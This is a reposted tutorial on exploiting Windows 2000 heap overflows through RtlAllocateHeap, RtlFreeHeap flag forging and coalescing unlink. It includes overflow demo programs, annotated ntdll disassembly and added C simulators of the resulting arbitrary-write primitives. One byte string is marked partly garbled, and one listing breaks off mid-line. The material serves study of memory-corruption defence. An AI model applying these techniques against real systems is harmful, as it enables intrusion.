Reposted from Jiakang
A summary of three ways to exploit Windows heap overflows.

1. Exploiting RtlAllocateHeap

This is the one isno described. See this example:

    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char *buf1, *buf2;
        char s[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"     /* 32 bytes fill buf1 */
                   "\x00\x00\x08\x00\x00\x00\x00\x00"     /* header of the free block after buf1 (partly garbled in the source) */
                   "\x11\x11\x11\x11\x21\x21\x21\x21";    /* its two list pointers */
        buf1 = (char *)malloc(32);   /* allocate two blocks */
        memcpy(buf1, s, 32 + 16);    /* copies 16 bytes too many */
        buf2 = (char *)malloc(16);
        free(buf1);
        free(buf2);
        return 0;
    }

After the malloc for buf1 completes, the returned pointer buf1 points into memory laid out like this:

    buf1's management structure (8 bytes) | buf1's usable space (32 bytes) | management structure of the next free block (8 bytes) | its two doubly-linked list pointers (8 bytes)

After the malloc for buf2 completes, the memory around buf1 looks like this:

    buf1's management structure (8 bytes) | buf1's usable space (32 bytes) | buf2's management structure (8 bytes) | buf2's usable space (16 bytes) | two doubly-linked list pointers (8 bytes)

Now, if the memcpy into buf1 overflows and overwrites the free block's management structure (8 bytes) and its two doubly-linked list pointers (8 bytes), 16 bytes in total, the RtlAllocateHeap call for buf2 raises an exception. The reason is this code in RtlAllocateHeap:

    001B:77FCC453  8901            MOV   [ECX], EAX
    001B:77FCC455  894804          MOV   [EAX+04], ECX

At this point ECX holds one of the two list pointers (0x21212121) and EAX holds the other (0x11111111). As with a format-string overflow, you can write any data to any address. This case is fairly simple; the precondition is that buf1 can be overflowed before buf2 is allocated.

2. Exploiting RtlFreeHeap

This is the one ilsy described. See this example:

    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char *buf1, *buf2;
        char s[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x03\x00\x05\x00\x00\x09";
        buf1 = (char *)malloc(32);   /* allocate two blocks */
        buf2 = (char *)malloc(16);
        memcpy(buf1, s, 32 + 6);     /* copies 6 bytes too many */
        free(buf1);
        free(buf2);
        return 0;
    }

Because the copy into buf1 runs 6 bytes over, those 6 bytes overwrite buf2's management structure, and free(buf2) raises an exception.
So we need to construct these 6 bytes carefully. Here is the definition of the 8-byte management structure (taken from the Windows source code):

    typedef struct _HEAP_ENTRY {
        //
        // This field gives the size of the current block in allocation
        // granularity units. (i.e. Size << HEAP_GRANULARITY_SHIFT
        // equals the size in bytes).
        //
        // Except if this is part of a virtual alloc block then this
        // value is the difference between the commit size in the virtual
        // alloc entry and the what the user asked for.
        //
        USHORT Size;

        //
        // This field gives the size of the previous block in allocation
        // granularity units. (i.e. PreviousSize << HEAP_GRANULARITY_SHIFT
        // equals the size of the previous block in bytes).
        //
        USHORT PreviousSize;

        //
        // This field contains the index into the segment that controls
        // the memory for this block.
        //
        UCHAR SegmentIndex;

        //
        // This field contains various flag bits associated with this block.
        // Currently these are:
        //
        //  0x01 - HEAP_ENTRY_BUSY
        //  0x02 - HEAP_ENTRY_EXTRA_PRESENT
        //  0x04 - HEAP_ENTRY_FILL_PATTERN
        //  0x08 - HEAP_ENTRY_VIRTUAL_ALLOC
        //  0x10 - HEAP_ENTRY_LAST_ENTRY
        //  0x20 - HEAP_ENTRY_SETTABLE_FLAG1
        //  0x40 - HEAP_ENTRY_SETTABLE_FLAG2
        //  0x80 - HEAP_ENTRY_SETTABLE_FLAG3
        //
        UCHAR Flags;

        //
        // This field contains the number of unused bytes at the end of this
        // block that were not actually allocated.  Used to compute exact
        // size requested prior to rounding requested size to allocation
        // granularity.  Also used for tail checking purposes.
        //
        UCHAR UnusedBytes;

        //
        // Small (8 bit) tag indexes can go here.
        //
        UCHAR SmallTagIndex;

    #if defined(_WIN64)
        ULONGLONG Reserved1;
    #endif
    } HEAP_ENTRY, *PHEAP_ENTRY;
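The following is an added example, not code from the original post. It encodes and decodes the 8-byte HEAP_ENTRY just shown, converts malloc() sizes into the granularity units stored in it (the 0x05 and 0x03 of the examples), and simulates the two stores from the RtlAllocateHeap listing of the first method (MOV [ECX], EAX / MOV [EAX+04], ECX) to show the write-what-where they give and why the post's 0x11111111 / 0x21212121 pair ends in an exception. The 32-bit "memory" window and its base address 0x00310000 are constructed for the demo.

```c
/* Added example: HEAP_ENTRY layout plus the RtlAllocateHeap unlink, simulated.
 * The memory window and base address below are made up for the demo. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define HEAP_GRANULARITY_SHIFT   3     /* 8-byte units on 32-bit Windows */
#define HEAP_ENTRY_BUSY          0x01
#define HEAP_ENTRY_VIRTUAL_ALLOC 0x08
#define HEAP_ENTRY_LAST_ENTRY    0x10

struct heap_entry {
    uint16_t size;            /* this block, header included, in 8-byte units */
    uint16_t previous_size;   /* previous block, in 8-byte units */
    uint8_t  segment_index;
    uint8_t  flags;
    uint8_t  unused_bytes;
    uint8_t  small_tag_index;
};

/* Units a malloc(n) block occupies: n bytes plus the 8-byte header, rounded up to 8. */
uint16_t heap_units(size_t n) { return (uint16_t)((n + 8 + 7) >> HEAP_GRANULARITY_SHIFT); }

/* Little-endian, exactly as the bytes sit in front of the user data. */
void heap_entry_encode(const struct heap_entry *e, uint8_t out[8]) {
    out[0] = (uint8_t)e->size;          out[1] = (uint8_t)(e->size >> 8);
    out[2] = (uint8_t)e->previous_size; out[3] = (uint8_t)(e->previous_size >> 8);
    out[4] = e->segment_index;          out[5] = e->flags;
    out[6] = e->unused_bytes;           out[7] = e->small_tag_index;
}

void heap_entry_decode(const uint8_t in[8], struct heap_entry *e) {
    e->size          = (uint16_t)(in[0] | in[1] << 8);
    e->previous_size = (uint16_t)(in[2] | in[3] << 8);
    e->segment_index = in[4]; e->flags = in[5];
    e->unused_bytes  = in[6]; e->small_tag_index = in[7];
}

static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* A free block's header is followed by its LIST_ENTRY: Flink, then Blink. */
void free_block_encode(const struct heap_entry *hdr, uint32_t flink, uint32_t blink, uint8_t out[16]) {
    heap_entry_encode(hdr, out);
    wr32(out + 8, flink);
    wr32(out + 12, blink);
}

/* Simulated 32-bit address space: a single 256-byte window at `base`. */
struct sim_mem { uint32_t base; uint8_t bytes[256]; };

static int in_window(const struct sim_mem *m, uint32_t a) {
    return a >= m->base && a + 4 <= m->base + sizeof m->bytes;
}

uint32_t sim_read32(const struct sim_mem *m, uint32_t a) {
    return in_window(m, a) ? rd32(m->bytes + (a - m->base)) : 0;
}

/* A store outside the window is what becomes an access violation on the real heap. */
static int sim_write32(struct sim_mem *m, uint32_t a, uint32_t v) {
    if (!in_window(m, a)) return 0;
    wr32(m->bytes + (a - m->base), v);
    return 1;
}

/* The unlink from the RtlAllocateHeap listing, with EAX = Flink and ECX = Blink
 * read from the 16 overflow bytes:
 *   MOV [ECX], EAX      ; Blink->Flink = Flink
 *   MOV [EAX+04], ECX   ; Flink->Blink = Blink
 * Returns 1 if both stores landed, 0 if one of them faulted. */
int sim_unlink(struct sim_mem *m, const uint8_t overflow16[16]) {
    uint32_t flink = rd32(overflow16 + 8), blink = rd32(overflow16 + 12);
    return sim_write32(m, blink, flink) && sim_write32(m, flink + 4, blink);
}

/* Write `value` at `target`: Flink = value, Blink = target. The second store then
 * puts `target` at value + 4, so `value` itself must be a writable address; that
 * is why the post's 0x11111111 / 0x21212121 pair raises an exception instead. */
int write_what_where(struct sim_mem *m, uint32_t target, uint32_t value) {
    struct heap_entry hdr = { 0, heap_units(32), 0, 0, 0, 0 };   /* free block right after buf1 */
    uint8_t payload[16];
    free_block_encode(&hdr, value, target, payload);
    return sim_unlink(m, payload);
}

int main(void) {
    struct sim_mem m = { 0x00310000u, {0} };
    uint32_t target = m.base + 0x40, value = m.base + 0x80;
    int ok = write_what_where(&m, target, value);
    printf("controlled pair: %s, [%08x] = %08x, [%08x] = %08x\n", ok ? "landed" : "fault",
           target, sim_read32(&m, target), value + 4, sim_read32(&m, value + 4));
    printf("post's pair:     %s\n", write_what_where(&m, 0x21212121u, 0x11111111u) ? "landed" : "fault");
    return 0;
}
```

The side effect of the second store is the practical constraint on this primitive: whatever you write has to be a readable, writable address, so a raw shellcode address or return address can be written but an arbitrary constant cannot.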
So the management structure is: Size (2 bytes) | PreviousSize (2 bytes) | SegmentIndex (1 byte) | Flags (1 byte) | UnusedBytes (1 byte) | SmallTagIndex (1 byte). Note that the sizes here are the real size (including the 8-byte header) divided by 8. Look at the flag definitions above, then at a few key places in RtlFreeHeap.

Key point one:

    001B:77FCC829  8A4605          MOV   AL, [ESI+05]              ; ESI points to the start of buf2's 8-byte management structure, AL is Flags
    001B:77FCC82C  A801            TEST  AL, 01                    ; does Flags contain HEAP_ENTRY_BUSY?
    001B:77FCC82E  0F84A40E0000    JZ    77FCD6D8                  ; jumps if not; must not jump here
    001B:77FCC834  F6C207          TEST  DL, 07
    001B:77FCC837  0F859B0E0000    JNZ   77FCD6D8
    001B:77FCC83D  807E0440        CMP   BYTE PTR [ESI+04], 40     ; jumps if [ESI+4] is 0x40 or more; must not jump here
    001B:77FCC841  0F83910E0000    JAE   77FCD6D8
    001B:77FCC847  834DFCFF        OR    DWORD PTR [EBP-04], -01
    001B:77FCC84B  A8E0            TEST  AL, E0                    ; does Flags contain HEAP_ENTRY_SETTABLE_FLAG1/2/3?
    001B:77FCC84D  754A            JNZ   77FCC899                  ; jumps if any of them is set; not important
    001B:77FCC84F  8B8F80050000    MOV   ECX, [EDI+00000580]
    001B:77FCC855  85C9            TEST  ECX, ECX
    001B:77FCC857  7440            JZ    77FCC899                  ; must jump to key point two

Key point two:

    001B:77FCC899  C745FC01000000  MOV   DWORD PTR [EBP-04], 00000001
    001B:77FCC8A0  F6C301          TEST  BL, 01
    001B:77FCC8A3  750F            JNZ   77FCC8B4                  ; jumps here
    001B:77FCC8A5  FFB778050000    PUSH  DWORD PTR [EDI+00000578]
    001B:77FCC8AB  E853C8FBFF      CALL  NTDLL!RtlEnterCriticalSection
    001B:77FCC8B0  C645D401        MOV   BYTE PTR [EBP-2C], 01
    001B:77FCC8B4  F6460508        TEST  BYTE PTR [ESI+05], 08     ; does Flags contain HEAP_ENTRY_VIRTUAL_ALLOC?
    001B:77FCC8B8  0F858BF2FFFF    JNZ   77FCBB49                  ; jumps if set; here we want the jump

Key point three:

    001B:77FCBB49  83C6E8          ADD   ESI, -18                  ; ilsy says this 0x18 differs between Windows versions
    001B:77FCBB4C  89759C          MOV   [EBP-64], ESI
    001B:77FCBB4F  8B06            MOV   EAX, [ESI]
    001B:77FCBB51  894598          MOV   [EBP-68], EAX
    001B:77FCBB54  8B7604          MOV   ESI, [ESI+04]
    001B:77FCBB57  897594          MOV   [EBP-6C], ESI
    001B:77FCBB5A  8906            MOV   [ESI], EAX                ; the exception happens here

We see EAX = 0x61616161 and ESI = 0x61616161: exactly the data in buf1. The start address of buf2's management structure minus 0x18 lies inside buf1's data, and the two values are loaded from there, so we control both of them.

So the second method has three preconditions:

1) The Flags byte of the constructed management structure (buf2's) must contain HEAP_ENTRY_BUSY and HEAP_ENTRY_VIRTUAL_ALLOC; it can simply be set to 0xFF.
2) The byte in front of Flags (SegmentIndex) must be smaller than 0x40.
3) The block being overflowed (buf1) must be at least 0x18 + 0x08 = 32 bytes; otherwise ESI points into a region we do not control and the exploit fails.

ilsy also mentions that the first byte of the 8-byte management structure must be greater than 0x80. On my machine (Windows 2000 Pro CN SP4) that is not needed: he uses 0x99, I use 0x03, and both work.

3. Unlink during coalescing in RtlFreeHeap

This one is my own research, and the first heap exception I looked into. Before that I spent two hours reading a few posts and worked out that it is the unlink that happens when this block is freed. See this example:

    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char *buf1, *buf2;
        char s[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"     /* 32 bytes fill buf1 */
                   "\x03\x00\x05\x00\x00\x00\x08\x00"     /* buf2's management structure: Size 3, PreviousSize 5, Flags 0 */
                   "\x11\x11\x11\x11\x22\x22\x22\x22";    /* two list pointers where buf2's data begins */
        buf1 = (char *)malloc(32);   /* allocate two blocks */
        buf2 = (char *)malloc(16);
        memcpy(buf1, s, 32 + 16);    /* copies 16 bytes too many */
        free(buf1);
        return 0;
    }

It looks fine, but when you run it you find that, unlike the cases above, the exception occurs at free(buf1).
Again, look at the key points in RtlFreeHeap. Key point one is the same as in the second method: we try to reach key point two.

Key point two:

    001B:77FCC899  C745FC01000000  MOV   DWORD PTR [EBP-04], 00000001
    001B:77FCC8A0  F6C301          TEST  BL, 01
    001B:77FCC8A3  750F            JNZ   77FCC8B4
    001B:77FCC8A5  FFB778050000    PUSH  DWORD PTR [EDI+00000578]
    001B:77FCC8AB  E853C8FBFF      CALL  NTDLL!RtlEnterCriticalSection
    001B:77FCC8B0  C645D401        MOV   BYTE PTR [EBP-2C], 01
    001B:77FCC8B4  F6460508        TEST  BYTE PTR [ESI+05], 08     ; does Flags contain HEAP_ENTRY_VIRTUAL_ALLOC?
    001B:77FCC8B8  0F858BF2FFFF    JNZ   77FCBB49                  ; jumps if set; this time it must not jump
    001B:77FCC8BE  0FB706          MOVZX EAX, WORD PTR [ESI]
    001B:77FCC8C1  8945D0          MOV   [EBP-30], EAX
    001B:77FCC8C4  F6470C80        TEST  BYTE PTR [EDI+0C], 80
    001B:77FCC8C8  7515            JNZ   77FCC8DF
    001B:77FCC8CA  6A00            PUSH  00
    001B:77FCC8CC  8D45D0          LEA   EAX, [EBP-30]
    001B:77FCC8CF  50              PUSH  EAX
    001B:77FCC8D0  56              PUSH  ESI
    001B:77FCC8D1  57              PUSH  EDI
    001B:77FCC8D2  E8EA000000      CALL  77FCC9C1                  ; enter this call: key point three

Key point three:

    001B:77FCC9C1  55              PUSH  EBP
    001B:77FCC9C2  8BEC            MOV   EBP, ESP
    001B:77FCC9C4  53              PUSH  EBX
    001B:77FCC9C5  56              PUSH  ESI
    001B:77FCC9C6  8B750C          MOV   ESI, [EBP+0C]
    001B:77FCC9C9  8B5D08          MOV   EBX, [EBP+08]
    001B:77FCC9CC  57              PUSH  EDI
    001B:77FCC9CD  8BFE            MOV   EDI, ESI                  ; ESI points to the start of buf1's management structure
    001B:77FCC9CF  0FB74602        MOVZX EAX, WORD PTR [ESI+02]    ; size of the block before buf1 into EAX
    001B:77FCC9D3  C1E003          SHL   EAX, 03                   ; times 8 gives the real size
    001B:77FCC9D6  2BF8            SUB   EDI, EAX                  ; EDI points to the start of the previous block
    001B:77FCC9D8  3BFE            CMP   EDI, ESI
    001B:77FCC9DA  740A            JZ    77FCC9E6
    001B:77FCC9DC  F6470501        TEST  BYTE PTR [EDI+05], 01     ; does the previous block's Flags contain HEAP_ENTRY_BUSY?
    001B:77FCC9E0  0F8498E9FFFF    JZ    77FCB37E                  ; must not jump
    001B:77FCC9E6  F6460510        TEST  BYTE PTR [ESI+05], 10     ; does buf1's Flags contain HEAP_ENTRY_LAST_ENTRY?
    001B:77FCC9EA  750F            JNZ   77FCC9FB                  ; must not jump
    001B:77FCC9EC  8B4510          MOV   EAX, [EBP+10]
    001B:77FCC9EF  8B00            MOV   EAX, [EAX]                ; buf1's block size
    001B:77FCC9F1  F644C60501      TEST  BYTE PTR [EAX*8+ESI+05], 01 ; does buf2's Flags contain HEAP_ENTRY_BUSY?
    001B:77FCC9F6  8D3CC6          LEA   EDI, [EAX*8+ESI]          ; EDI points to the start of buf2's management structure
    001B:77FCC9F9  7409            JZ    77FCCA04                  ; not set (merge with a free block?): jumps, and we want that
    001B:77FCC9FB  8BC6            MOV   EAX, ESI
    001B:77FCC9FD  5F              POP   EDI
    001B:77FCC9FE  5E              POP   ESI
    001B:77FCC9FF  5B              POP   EBX
    001B:77FCCA00  5D              POP   EBP
    001B:77FCCA01  C21000          RET   0010
    001B:77FCCA04  0FB70F          MOVZX ECX, WORD PTR [EDI]       ; buf2's block size
    001B:77FCCA07  03C8            ADD   ECX, EAX                  ; plus buf1's block size
    001B:77FCCA09  81F900FE0000    CMP   ECX, 0000FE00             ; greater than 0xFE00?
    001B:77FCCA0F  77EA            JA    77FCC9FB                  ; if greater, jump,
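The following is an added example, not code from the original post. It models the RtlFreeHeap checks quoted above (Windows 2000, as disassembled on this page) over the same buf1 = malloc(32) / buf2 = malloc(16) layout and the same overflow bytes, and reports which path a free() takes and which store that path attempts: the MOV [ESI], EAX of the second method, or the unlink of the third. The heap image, its base address 0x00310000 and the blocks around buf1/buf2 are constructed for the demo; the unlink at the end of the coalescing path is assumed to be the usual Blink->Flink / Flink->Blink store pair, which the listing stops just short of, and the backward-merge path (JZ 77FCB37E) is not modelled.

```c
/* Added example: RtlFreeHeap's checks from the listings, run over a constructed
 * heap image. BASE, the neighbouring blocks and the final unlink are assumptions. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define HEAP_ENTRY_BUSY          0x01
#define HEAP_ENTRY_VIRTUAL_ALLOC 0x08
#define HEAP_ENTRY_LAST_ENTRY    0x10

enum path { INVALID_NOT_BUSY, INVALID_SEGMENT, PREV_FREE_NOT_MODELLED, LAST_ENTRY_NOT_MODELLED,
            NO_COALESCE, VIRTUAL_ALLOC_WRITE, COALESCE_UNLINK, FAULT };

/* Constructed heap image, offsets from BASE: a busy block, buf1, buf2, a busy tail block. */
#define BASE     0x00310000u
#define PREV_HDR 0
#define BUF1_HDR 16
#define BUF1     (BUF1_HDR + 8)
#define BUF2_HDR (BUF1 + 32)
#define BUF2     (BUF2_HDR + 8)
#define TAIL_HDR (BUF2 + 16)
#define IMG_SIZE 128

struct sim { uint8_t img[IMG_SIZE]; uint32_t w_addr, w_val; };   /* w_*: last attempted store */

static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static void put_hdr(uint8_t *p, uint16_t size, uint16_t prev, uint8_t flags) {   /* Size | PreviousSize | SegmentIndex | Flags | UnusedBytes | SmallTagIndex */
    p[0] = (uint8_t)size; p[1] = (uint8_t)(size >> 8); p[2] = (uint8_t)prev; p[3] = (uint8_t)(prev >> 8);
    p[4] = 0; p[5] = flags; p[6] = 0; p[7] = 0;
}

void sim_init(struct sim *s) {
    memset(s, 0, sizeof *s);
    put_hdr(s->img + PREV_HDR, 2, 0, HEAP_ENTRY_BUSY);                  /* 16-byte busy block */
    put_hdr(s->img + BUF1_HDR, 5, 2, HEAP_ENTRY_BUSY);                  /* 32 + 8 = 40 bytes = 5 units */
    put_hdr(s->img + BUF2_HDR, 3, 5, HEAP_ENTRY_BUSY);                  /* 16 + 8 = 24 bytes = 3 units */
    put_hdr(s->img + TAIL_HDR, 1, 3, HEAP_ENTRY_BUSY | HEAP_ENTRY_LAST_ENTRY);
}

uint32_t sim_peek(const struct sim *s, uint32_t addr) { return rd32(s->img + (addr - BASE)); }

/* A store that lands in the image, or "faults" like the exceptions described above. */
static enum path store32(struct sim *s, uint32_t addr, uint32_t val, enum path ok) {
    s->w_addr = addr; s->w_val = val;
    if (addr < BASE || addr + 4 > BASE + IMG_SIZE) return FAULT;
    wr32(s->img + (addr - BASE), val);
    return ok;
}

/* RtlFreeHeap on the block whose 8-byte management structure is at image offset `hdr`. */
enum path sim_free(struct sim *s, size_t hdr) {
    const uint8_t *e = s->img + hdr;
    if (!(e[5] & HEAP_ENTRY_BUSY)) return INVALID_NOT_BUSY;        /* TEST AL,01 / JZ 77FCD6D8 */
    if (e[4] >= 0x40) return INVALID_SEGMENT;                        /* CMP BYTE PTR [ESI+04],40 / JAE */
    if (e[5] & HEAP_ENTRY_VIRTUAL_ALLOC) {                           /* TEST BYTE PTR [ESI+05],08 / JNZ 77FCBB49 */
        if (hdr < 0x18) return FAULT;
        uint32_t val = rd32(e - 0x18), dst = rd32(e - 0x14);         /* ADD ESI,-18; EAX=[ESI]; ESI=[ESI+04] */
        return store32(s, dst, val, VIRTUAL_ALLOC_WRITE);            /* MOV [ESI],EAX: the second method */
    }
    /* coalescing routine at 77FCC9C1 */
    size_t prev_len = rd16(e + 2) * 8u;                              /* MOVZX EAX,[ESI+02]; SHL EAX,03 */
    if (prev_len > hdr) return FAULT;
    if (prev_len && !(s->img[hdr - prev_len + 5] & HEAP_ENTRY_BUSY)) return PREV_FREE_NOT_MODELLED;
    if (e[5] & HEAP_ENTRY_LAST_ENTRY) return LAST_ENTRY_NOT_MODELLED;
    size_t next = hdr + rd16(e) * 8u;                                /* LEA EDI,[EAX*8+ESI] */
    if (next + 16 > IMG_SIZE) return FAULT;
    if (s->img[next + 5] & HEAP_ENTRY_BUSY) return NO_COALESCE;      /* next block in use: plain free */
    if (rd16(s->img + next) + rd16(e) > 0xFE00) return NO_COALESCE;  /* CMP ECX,0000FE00 / JA 77FCC9FB */
    /* next block looks free: unlink it, Flink = [next+8], Blink = [next+12] (the third method) */
    uint32_t flink = rd32(s->img + next + 8), blink = rd32(s->img + next + 12);
    if (store32(s, blink, flink, COALESCE_UNLINK) == FAULT) return FAULT;
    return store32(s, flink + 4, blink, COALESCE_UNLINK);
}

/* Second method: the post's 6 overflow bytes on buf2's header, then free(buf2).
 * `val` and `dst` are placed where ESI-0x18 and ESI-0x14 are read from: buf1+8 and buf1+12. */
enum path scenario_method2(struct sim *s, uint32_t dst, uint32_t val) {
    uint8_t p[32 + 6];
    memset(p, 'a', sizeof p);
    memcpy(p + 32, "\x03\x00\x05\x00\x00\x09", 6);
    wr32(p + 8, val); wr32(p + 12, dst);
    sim_init(s);
    memcpy(s->img + BUF1, p, sizeof p);                              /* memcpy(buf1, s, 32 + 6) */
    return sim_free(s, BUF2_HDR);
}

/* Third method: buf2's header rewritten as a free block with Flink/Blink after it, then free(buf1). */
enum path scenario_method3(struct sim *s, uint32_t flink, uint32_t blink) {
    uint8_t p[32 + 16];
    memset(p, 'a', sizeof p);
    memcpy(p + 32, "\x03\x00\x05\x00\x00\x00\x08\x00", 8);          /* Size 3, PreviousSize 5, Flags 0 */
    wr32(p + 40, flink); wr32(p + 44, blink);
    sim_init(s);
    memcpy(s->img + BUF1, p, sizeof p);                              /* memcpy(buf1, s, 32 + 16) */
    return sim_free(s, BUF1_HDR);
}

int main(void) {
    struct sim s;
    enum path r = scenario_method2(&s, 0x61616161u, 0x61616161u);
    printf("method 2, post's bytes: path %d, store [%08x] = %08x\n", r, s.w_addr, s.w_val);
    r = scenario_method3(&s, 0x11111111u, 0x22222222u);
    printf("method 3, post's bytes: path %d, store [%08x] = %08x\n", r, s.w_addr, s.w_val);
    r = scenario_method3(&s, BASE + 100, BASE + 110);
    printf("method 3, in-image pointers: path %d, [%08x] = %08x\n", r, BASE + 110, sim_peek(&s, BASE + 110));
    return 0;
}
```

Run as is, the first two scenarios reproduce the exceptions the post describes (EAX = ESI = 0x61616161 for free(buf2), and a store to 0x22222222 for free(buf1)); the third shows the same coalescing path completing once Flink and Blink point at writable memory, which is the write-what-where the third method gives.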